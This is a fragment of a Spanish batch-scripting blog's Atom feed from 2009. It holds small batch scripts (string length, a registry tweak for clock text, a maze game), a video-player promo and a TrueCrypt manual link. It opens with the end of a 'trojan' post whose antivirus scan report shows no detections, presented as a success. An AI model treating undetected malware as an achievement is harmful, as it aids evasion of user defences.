verdana;"&gt; Avast - -&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; AVG - -&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; BitDefender - -&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; ClamAV - -&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; Comodo - -&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; Dr.Web - -&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; Ewido - -&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; F-PROT6 - -&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; Ikarus T3 - -&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; Kaspersky - -&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; McAfee - -&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; NOD32 v3 - -&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; Norman - -&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; Panda - -&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; QuickHeal - -&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; Solo Antivirus - -&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; Sophos - -&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; TrendMicro - -&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; VBA32 - -&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; VirusBuster - -&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt; ZonerAntivirus - -&lt;/span&gt;&lt;br /&gt; &lt;br /&gt; &lt;i style="font-family: verdana;"&gt;Scan report generated by&lt;br /&gt;&lt;a href="http://novirusthanks.org/" target="_blank"&gt;NoVirusThanks.org&lt;/a&gt;&lt;/i&gt;&lt;br /&gt; &lt;br /&gt;&lt;span style="font-family: verdana;"&gt;  ;D &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-1696165619232756719?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/1696165619232756719/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2009/09/troyano-parasitario-1l1l3l5a.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/1696165619232756719'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/1696165619232756719'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2009/09/troyano-parasitario-1l1l3l5a.html' title='[Troyano Parasitario] 1l1l3l5.a'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-5115244278852326705</id><published>2009-09-25T06:39:00.000-07:00</published><updated>2009-09-25T06:41:11.170-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Funcion Lenght'/><category scheme='http://www.blogger.com/atom/ns#' term='Batch'/><category scheme='http://www.blogger.com/atom/ns#' term='efecto'/><title type='text'>Función Lenght + efecto - by xassiz</title><content type='html'>&lt;span style="font-weight: bold; font-family: verdana;"&gt;Título:&lt;/span&gt;&lt;span style="font-family: verdana;"&gt; Función Lenght + efecto&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-family: verdana;"&gt;Temática:&lt;/span&gt;&lt;span style="font-family: verdana;"&gt; Strings&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-family: verdana;"&gt;Autor:&lt;/span&gt;&lt;span style="font-family: verdana;"&gt; xassiz&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-family: verdana;"&gt;Descripción:&lt;/span&gt;&lt;span style="font-family: verdana;"&gt; Muestra la longitud de una cadena introducida, y la muestra en vertical.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-family: verdana;"&gt;Funcionamiento&lt;/span&gt;&lt;span style="font-family: verdana;"&gt;: Pide una string, y llama a la etiqueta lenght para medirla con un contador. Luego crea una variable para cada caracter y los muestre verticalmente.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;code&gt;@echo off&lt;br /&gt;title Funcion Lenght + efecto  -  by xassiz!&lt;br /&gt;setlocal enabledelayedexpansion&lt;br /&gt;:main&lt;br /&gt;(set txt=)&lt;br /&gt;set/p "txt=String&gt; "&lt;br /&gt;if not defined txt (goto:main)&lt;br /&gt;set/a cont=0&lt;br /&gt;call :lenght&lt;br /&gt;cls&lt;br /&gt;echo."%txt%" mide %cont%&lt;br /&gt;pause&gt;nul&lt;br /&gt;echo.&lt;br /&gt;for /L %%_ in (1,1,%cont%) do (echo.!let[%%_]!)&lt;br /&gt;echo.&lt;br /&gt;pause&gt;nul&lt;br /&gt;exit&lt;br /&gt;:lenght&lt;br /&gt;set "var=!txt:~%cont%,1!"&lt;br /&gt;if not defined var (goto:eof)&lt;br /&gt;set/a cont+=1&lt;br /&gt;set "let[%cont%]=%var%"&lt;br /&gt;goto:lenght&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Salida:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;br /&gt;String&gt; me llamo xassiz&lt;br /&gt;&lt;br /&gt;'se borra la pantalla&lt;br /&gt;&lt;br /&gt;"me llamo xassiz" mide 15&lt;br /&gt;&lt;br /&gt;'hace una pausa&lt;br /&gt;&lt;br /&gt;m&lt;br /&gt;e&lt;br /&gt;&lt;br /&gt;l&lt;br /&gt;l&lt;br /&gt;a&lt;br /&gt;m&lt;br /&gt;o&lt;br /&gt;&lt;br /&gt;x&lt;br /&gt;a&lt;br /&gt;s&lt;br /&gt;s&lt;br /&gt;i&lt;br /&gt;z&lt;br /&gt;&lt;/code&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-5115244278852326705?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/5115244278852326705/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2009/09/funcion-lenght-efecto-by-xassiz.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/5115244278852326705'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/5115244278852326705'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2009/09/funcion-lenght-efecto-by-xassiz.html' title='Función Lenght + efecto - by xassiz'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-8040410502207980776</id><published>2009-09-25T06:32:00.000-07:00</published><updated>2009-09-25T06:33:22.081-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Batch'/><title type='text'>[PTLR] Pon Texto al Lado del Reloj - by xassiz</title><content type='html'>&lt;span style="font-family: verdana;"&gt;Bueno, hoy os traigo este sencilla aplicacion, para poner texto al lado del reloj de Windows.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Espero que os guste! Saludos!!&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;code&gt;@echo off&lt;br /&gt;title Pon Texto al Lado del Reloj - by xassiz&lt;br /&gt;color 0a&lt;br /&gt;:main&lt;br /&gt;cls&amp;amp;echo.&lt;br /&gt;set "text="&lt;br /&gt;set/p "text=Texto&gt; "&lt;br /&gt;@(reg add "HKCU\Control Panel\International" /v s1159 /t REG_SZ /d "%text%" /f&lt;br /&gt;reg add "HKCU\Control Panel\International" /v s2359 /t REG_SZ /d "%text%" /f&lt;br /&gt;reg add "HKCU\Control Panel\International" /v sTimeFormat /t REG_SZ /d "HH:mm:ss tt" /f&lt;br /&gt;reg add "HKEY_USERS\.DEFAULT\Control Panel\International" /v s1159 /t REG_SZ /d "%text%" /f&lt;br /&gt;reg add "HKEY_USERS\.DEFAULT\Control Panel\International" /v s2359 /t REG_SZ /d "%text%" /f&lt;br /&gt;reg add "HKEY_USERS\.DEFAULT\Control Panel\International" /v sTimeFormat /t REG_SZ /d "HH:mm:ss tt" /f&lt;br /&gt;taskkill /im explorer.exe /f || tskill explorer)&gt;nul 2&gt;&amp;amp;1&lt;br /&gt;echo.msgbox"Proceso Finalizado",99,"PTLR - by xassiz"&gt;%temp%\PTLR.vbs&lt;br /&gt;start %temp%\PTLR.vbs&lt;br /&gt;start explorer.exe&lt;br /&gt;goto:main&lt;/code&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-8040410502207980776?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/8040410502207980776/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2009/09/ptlr-pon-texto-al-lado-del-reloj-by.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/8040410502207980776'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/8040410502207980776'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2009/09/ptlr-pon-texto-al-lado-del-reloj-by.html' title='[PTLR] Pon Texto al Lado del Reloj - by xassiz'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-3281519328561402455</id><published>2009-09-25T06:29:00.000-07:00</published><updated>2009-09-25T06:31:24.512-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Batch Game'/><title type='text'>[Batch Game] Maze Maddness - by Splendit</title><content type='html'>&lt;span style="font-family: verdana;"&gt;Bueno, os traigo un juego que se me hizo entretenido, programado en Batch.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Tienes que llegar con la pelota a la X sin caerte, facil!&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;code&gt;@echo off&lt;br /&gt;@title Maze Madness&lt;br /&gt;@mode con cols=22 lines=20&lt;br /&gt;::Batch Game Maze Madness&lt;br /&gt;::by Splendit&lt;br /&gt;::Based On SmartGenius Batch Game Logics&lt;br /&gt;&lt;br /&gt;setlocal enabledelayedexpansion&lt;br /&gt;If Not Exist Keyboard.exe (Call :Keyboard)&lt;br /&gt;&lt;br /&gt;:Vars&lt;br /&gt;Set LimX=16&lt;br /&gt;Set LimY=16&lt;br /&gt;Set IniX=0&lt;br /&gt;Set IniY=0&lt;br /&gt;Set MovX=0&lt;br /&gt;Set MovY=0&lt;br /&gt;Set "Bound=Û"&lt;br /&gt;Set "Space= "&lt;br /&gt;Set "Player=O"&lt;br /&gt;Set "Limit=°"&lt;br /&gt;Set "Exit=X"&lt;br /&gt;&lt;br /&gt;:Init&lt;br /&gt;For /l %%a in (%IniX%,1,%LimX%) do (&lt;br /&gt;For /l %%b in (%IniY%,1,%LimY%) do (&lt;br /&gt;Set X%%aY%%b=%Limit%))&lt;br /&gt;Call :Nivel_1&lt;br /&gt;Set "X4Y6=%Player%"&lt;br /&gt;Set Curpos=X4Y6&lt;br /&gt;Goto :Graphic&lt;br /&gt;&lt;br /&gt;:Graphic&lt;br /&gt;Call :Clear&lt;br /&gt;For /l %%d in (%IniX%,1,%LimY%) do (&lt;br /&gt;For /l %%e in (%IniX%,1,%LimX%) do (&lt;br /&gt;Set Lin_%%d=!Lin_%%d!!X%%eY%%d!))&lt;br /&gt;Echo.&lt;br /&gt;Echo.&lt;br /&gt;For /l %%f in (0,1,%LimY%) do (echo.  !Lin_%%f!)&lt;br /&gt;Echo.&lt;br /&gt;If Defined MovL (&lt;br /&gt;Ping -n 1 localhost &gt;nul&lt;br /&gt;Call :%MovL% "%CurPos%"&lt;br /&gt;Goto :Graphic&lt;br /&gt;) else (&lt;br /&gt;Keyboard&lt;br /&gt;)&lt;br /&gt;If "%errorlevel%"=="77" (call :MovX "+" "%CurPos%")&lt;br /&gt;If "%errorlevel%"=="75" (call :MovX "-" "%CurPos%")&lt;br /&gt;If "%errorlevel%"=="80" (call :MovY "+" "%CurPos%")&lt;br /&gt;If "%errorlevel%"=="72" (call :MovY "-" "%CurPos%")&lt;br /&gt;If "%errorlevel%"=="88" (pause&amp;amp;exit)&lt;br /&gt;If "%errorlevel%"=="120" (pause&amp;amp;exit)&lt;br /&gt;Goto :Graphic&lt;br /&gt;&lt;br /&gt;:MovY&lt;br /&gt;For /f "tokens=1,2 delims=X,Y" %%p in ("%~2") do (&lt;br /&gt;if "%%q"=="%LimY%" Goto :Eof&lt;br /&gt;Set /a MovY=%%q%~11&lt;br /&gt;Call Set NMovY=%%X%%pY!MovY!%%&lt;br /&gt;If "!NMovY!"=="%Bound%" (Set "MovL="&amp;amp;Goto :Eof)&lt;br /&gt;If "!NMovY!"=="%Exit%" (Goto :Win)&lt;br /&gt;If "!NMovY!"=="%Limit%" (Goto :Lose)&lt;br /&gt;Set X%%pY!MovY!=%Player%&lt;br /&gt;Set CurPos=X%%pY!MovY!&lt;br /&gt;Set MovL=MovY "%~1"&lt;br /&gt;Set "%~2=%Space%")&lt;br /&gt;Goto :Eof&lt;br /&gt;&lt;br /&gt;:MovX&lt;br /&gt;For /f "tokens=1,2 delims=X,Y" %%p in ("%~2") do (&lt;br /&gt;If "%%p"=="%LimX%" Goto :Eof&lt;br /&gt;Set /a MovX=%%p%~11&lt;br /&gt;Call Set NMovX=%%X!MovX!Y%%q%%&lt;br /&gt;If "!NMovX!"=="%Bound%" (Set "MovL="&amp;amp;Goto :Eof)&lt;br /&gt;If "!NMovX!"=="%Exit%" (Goto :Win)&lt;br /&gt;If "!NMovX!"=="%Limit%" (Goto :Lose)&lt;br /&gt;Set "X!MovX!Y%%q=%Player%"&lt;br /&gt;Set "CurPos=X!MovX!Y%%q"&lt;br /&gt;Set MovL=MovX "%~1"&lt;br /&gt;Set "%~2=%Space%")&lt;br /&gt;Goto :Eof&lt;br /&gt;&lt;br /&gt;:Clear&lt;br /&gt;for /l %%m in (0,1,%LimY%) do (set Lin_%%m=)&lt;br /&gt;Goto :Eof&lt;br /&gt;&lt;br /&gt;:Win&lt;br /&gt;Cls&lt;br /&gt;Echo.&lt;br /&gt;Echo.   Felicitaciones&lt;br /&gt;Echo.&lt;br /&gt;Echo.    Completaste&lt;br /&gt;Echo.     El Nivel&lt;br /&gt;Echo.&lt;br /&gt;Echo.&lt;br /&gt;Pause &gt;nul&lt;br /&gt;Exit&lt;br /&gt;&lt;br /&gt;:Lose&lt;br /&gt;Cls&lt;br /&gt;Echo.&lt;br /&gt;Echo.    Has Perdido&lt;br /&gt;Echo.&lt;br /&gt;Echo.  Intenta de Nuevo&lt;br /&gt;Echo.&lt;br /&gt;Echo.&lt;br /&gt;Set "MovL="&lt;br /&gt;Pause &gt;nul&lt;br /&gt;Goto :Vars&lt;br /&gt;&lt;br /&gt;:Nivel_1&lt;br /&gt;For %%a in (X1Y1,X1Y2,X1Y4,X1Y7,X1Y8,X1Y11,X2Y1,X2Y14,X2Y15,X3Y1,X3Y3,X3Y5,X3Y10,X3Y12,X4Y1,X4Y7,X5Y9,X5Y10,X5Y11,X6Y5,X6Y9,X6Y11,X6Y15,X7Y1,X7Y5,X7Y11,X7Y15,X8Y3,X8Y11,X8Y15,X9Y3,X9Y7,X9Y11,X9Y15,X10Y11,X10Y15,X11Y5,X11Y10,X11Y11,X11Y15,X12Y1,X12Y2,X12Y8,X12Y13,X13Y3,X13Y6,X13Y7,X13Y8,X13Y9,X13Y13,X14Y1,X14Y15,X15Y3,X15Y4,X15Y7,X15Y11,X15Y12,X15Y14,X15Y15) do (Set %%a=%Bound%)&lt;br /&gt;For %%a in (X1Y3,X1Y5,X1Y6,X1Y9,X1Y10,X1Y12,X1Y13,X1Y14,X1Y15,X2Y2,X2Y3,X2Y4,X2Y5,X2Y6,X2Y7,X2Y8,X2Y9,X2Y10,X2Y11,X2Y12,X2Y13,X3Y2,X3Y4,X3Y6,X3Y7,X3Y8,X3Y9,X3Y11,X3Y13,X3Y14,X3Y15,X4Y2,X4Y3,X4Y4,X4Y5,X4Y8,X4Y9,X4Y10,X4Y11,X4Y12,X4Y13,X4Y14,X4Y15,X5Y1,X5Y2,X5Y3,X5Y4,X5Y5,X5Y6,X5Y7,X5Y8,X5Y12,X5Y13,X5Y14,X5Y15,X6Y1,X6Y2,X6Y3,X6Y4,X6Y6,X6Y7,X6Y8,X6Y10,X6Y12,X6Y13,X6Y14,X7Y2,X7Y3,X7Y4,X7Y6,X7Y8,X7Y9,X7Y10,X7Y12,X7Y13,X7Y14,X8Y1,X8Y2,X8Y4,X8Y5,X8Y6,X8Y7,X8Y8,X8Y9,X8Y10,X8Y12,X8Y13,X8Y14,X9Y1,X9Y2,X9Y4,X9Y5,X9Y6,X9Y8,X9Y9,X9Y10,X9Y12,X9Y13,X9Y14,X10Y1,X10Y2,X10Y3,X10Y4,X10Y5,X10Y6,X10Y7,X10Y8,X10Y9,X10Y10,X10Y12,X10Y13,X10Y14,X11Y1,X11Y2,X11Y3,X11Y4,X11Y6,X11Y7,X11Y8,X11Y9,X11Y12,X11Y13,X11Y14,X12Y3,X12Y4,X12Y5,X12Y6,X12Y7,X12Y9,X12Y10,X12Y11,X12Y12,X12Y14,X12Y15,X13Y1,X13Y2,X13Y4,X13Y5,X13Y10,X13Y11,X13Y12,X13Y14,X13Y15,X14Y2,X14Y3,X14Y4,X14Y5,X14Y6,X14Y7,X14Y8,X14Y9,X14Y10,X14Y11,X14Y12,X14Y13,X14Y14,X15Y1,X15Y2,X15Y5,X15Y6,X15Y8,X15Y9,X15Y10,X15Y13) do (Set %%a=%Space%)&lt;br /&gt;Set "X7Y7=%Exit%"&lt;br /&gt;Goto :Eof&lt;br /&gt;&lt;br /&gt;:Keyboard&lt;br /&gt;Echo. Cargando...&lt;br /&gt;(&lt;br /&gt;echo n keyboard.dat&lt;br /&gt;echo e 0000 4D 5A 2E 00 01 00 00 00 02 00 00 10 FF FF F0 FF&lt;br /&gt;echo e 0010 FE FF 00 00 00 01 F0 FF 1C 00 00 00 00 00 00 00&lt;br /&gt;echo e 0020 B4 08 CD 21 3C 00 75 02 CD 21 B4 4C CD 21&lt;br /&gt;echo rcx&lt;br /&gt;echo 002E&lt;br /&gt;echo w0&lt;br /&gt;echo q&lt;br /&gt;echo.&lt;br /&gt;)&gt;keyboard.dat&lt;br /&gt;type keyboard.dat|debug&gt;NUL 2&gt;&amp;amp;1&lt;br /&gt;del /f/q/a "keyboard.exe"&gt;NUL 2&gt;&amp;amp;1&lt;br /&gt;ren keyboard.dat "keyboard.exe"&lt;br /&gt;Goto :Eof&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Espero que os guste tambien :P&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Saludos! With Batch, no Limits!!&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-3281519328561402455?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/3281519328561402455/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2009/09/batch-game-maze-maddness-by-splendit.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/3281519328561402455'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/3281519328561402455'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2009/09/batch-game-maze-maddness-by-splendit.html' title='[Batch Game] Maze Maddness - by Splendit'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-6232810399630053896</id><published>2009-08-12T06:55:00.000-07:00</published><updated>2009-08-12T06:56:23.381-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Flash'/><title type='text'>Phoenix Flash Player v1.0</title><content type='html'>&lt;span style="color:#ff0000;"&gt;&lt;b&gt;Reproduzca y descargue mucho más rápido sus videos...&lt;/b&gt;  &lt;/span&gt;  &lt;br /&gt;&lt;br /&gt;Un reproductor flash hecho a su medida, más rapido, más estable y sobre todo mucho más divertido.    &lt;br /&gt;&lt;br /&gt;Este reproductor de archivosShockWaveFlash &lt;b&gt;(.SWF)&lt;/b&gt; tiene opciones de reproducción por URL, además una lista de servidores de video, tales como el famoso "YouTube", entre muchos otros.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#ff0000;"&gt;&lt;b&gt;¿Te gustó el video y no lo puedes descargar?&lt;/b&gt; &lt;/span&gt;   &lt;br /&gt;&lt;br /&gt;Con el Phoenix Flash Player te lo descarga, ¿Cómo?, muy sencillo, copias la URL del video que deseas descargar y él directamente te abre una URL con la descarga.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#ff0000;"&gt;&lt;b&gt;¿Ves videos en MegaVideo pero te pone un limite de tiempo? &lt;/b&gt;    &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Pues con el Phoenix Flash Player eso quedó atrás, este software está implementando un nuevo método de reproducción, en el cual puedes pasar inadvertido y disfrutar de todos tus videos favoritos,&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#ff0000;"&gt;&lt;b&gt;Características:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://www.iconfinder.net/data/icons/kids/128x128/apps/iconthemes.png" alt="" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#ff0000;"&gt;&lt;b&gt;Nueva Apariencia&lt;/b&gt;    &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Puedes tener la apariencia de tu aplicación como desees, ¡Ajustala a tu medida!&lt;br /&gt;&lt;br /&gt;&lt;img src="http://cache.gawker.com/assets/images/17/2009/07/504x_GlassCmd1.png" alt="" border="0" /&gt;  &lt;br /&gt;&lt;br /&gt;&lt;span style="color:#ff0000;"&gt;&lt;b&gt;Transparencia &lt;/b&gt;     &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;¿Necesitas ocultar rápido tu aplicación?, pues con esta nueva opción lo puedes hacer, sólo necesitas un click y tu aplicación desaparecerá.&lt;br /&gt;&lt;br /&gt;&lt;img src="http://www.iconfinder.net/data/icons/CrystalClear/128x128/mimetypes/video.png" alt="" border="0" /&gt;  &lt;br /&gt;&lt;br /&gt;&lt;span style="color:#ff0000;"&gt;&lt;b&gt;Descarga y Reproducción de Videos (YouTube, Vimeo, MegaVideo)&lt;/b&gt;     &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;¿Quieres descarga un video de youtube pero no puedes?, pues encontraste la solución, ya que en este reproductor incorporamos la posibilidad de descargar archivos desde estos servidores, lo único que debes hacer es copiar la URL del video que deseas descargar y listo.&lt;br /&gt;&lt;br /&gt;Quieres reproducir en un tamaño mas grande que los de estos servidores, ademas de tener una carga 10 Veces más rapida!, copia y pega la URL del video que deseas ver, y el Phoenix Flash Player se encargaré del resto.&lt;br /&gt;&lt;br /&gt;Se añadió la opcion de pasar el filtro de tiempo de MegaVideo,&lt;b&gt; (Función Bet&lt;/b&gt;&lt;b&gt;a)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://www.iconfinder.net/data/icons/oxygen/128x128/mimetypes/application-x-mswinurl.png" alt="" border="0" /&gt;  &lt;br /&gt;&lt;br /&gt;&lt;span style="color:#ff0000;"&gt; &lt;b&gt;Descarga de archivos SWF desde cualquier URL &lt;/b&gt;   &lt;/span&gt; &lt;br /&gt;&lt;br /&gt;¿Encontraste algún juego o animación en SWF que te gustó pero no la puedes descargar?, pues aqui está la solución, solo debes copiar la URL y pegarla en el lugar respectivo, y Listo!, ya tienes tu Juego ó animación en tu PC.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#ff0000;"&gt;&lt;b&gt; Requerimientos del Sistema:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#ff0000;"&gt;&lt;b&gt;Sistemas operativos&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;Windows 2000&lt;br /&gt;Windows XP (Cualquier Service Pack)&lt;br /&gt;Windows Server 2003&lt;br /&gt;Windows Vista    &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:Red;"&gt;&lt;b&gt;Hardware mínimo&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Pentium 233 MHz (Recomendado: Pentium 500MHz o superior)&lt;br /&gt;64 MB RAM (Recomendado: 128 MB RAM o más)&lt;br /&gt;10 MB de espacio en disco&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#ff0000;"&gt;&lt;b&gt;Capturas&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://img200.imageshack.us/i/dibujocco.png/" target="_blank"&gt;&lt;img src="http://img200.imageshack.us/img200/8858/dibujocco.th.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://img31.imageshack.us/i/dibujo2oto.png/" target="_blank"&gt;&lt;img src="http://img31.imageshack.us/img31/7193/dibujo2oto.th.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:Red;"&gt;&lt;b&gt;Descarga (100% Gratuita)&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;a href="https://dl.getdropbox.com/u/1501514/RC%20Phoenix%20Flash%20Player.rar" target="_blank"&gt;&lt;span style="color:Yellow;"&gt;Phoenix Flash Player - Download &lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;i&gt;Fuente: Phoenix Software&lt;/i&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1525638350117099508-6232810399630053896?l=xassiz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xassiz.blogspot.com/feeds/6232810399630053896/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://xassiz.blogspot.com/2009/08/phoenix-flash-player-v10.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/6232810399630053896'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1525638350117099508/posts/default/6232810399630053896'/><link rel='alternate' type='text/html' href='http://xassiz.blogspot.com/2009/08/phoenix-flash-player-v10.html' title='Phoenix Flash Player v1.0'/><author><name>xassiz</name><uri>http://www.blogger.com/profile/15634923301921834243</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1525638350117099508.post-7876688459211879733</id><published>2009-08-12T04:31:00.000-07:00</published><updated>2009-08-12T04:34:40.961-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='TrueCrypt'/><title type='text'>Manual de TrueCrypt para Windows</title><content type='html'>Bueno, &lt;a href="http://www.kriptopolis.org/docs/tcmanual.pdf"&gt;&lt;span style="font-weight: bold;"&gt;aqui&lt;/span&gt;&lt;/a&gt; les dejo un &lt;a href="http://www.kriptopolis.org/docs/tcmanual.pdf"&gt;sencillo manual&lt;/a&gt; del conocido programa de cifrado &lt;a href="http://www.kriptopolis.org/truecrypt"&gt;&lt;span style="font-weight: bold;"&gt;TrueCrypt&lt;/span&gt;&lt;/a&gt; para Windows&lt;br /&gt;&lt;br /&gt;Saludos,&lt;br /&gt;xassiz&lt;br /&gt;&lt;br /&gt;&lt;br 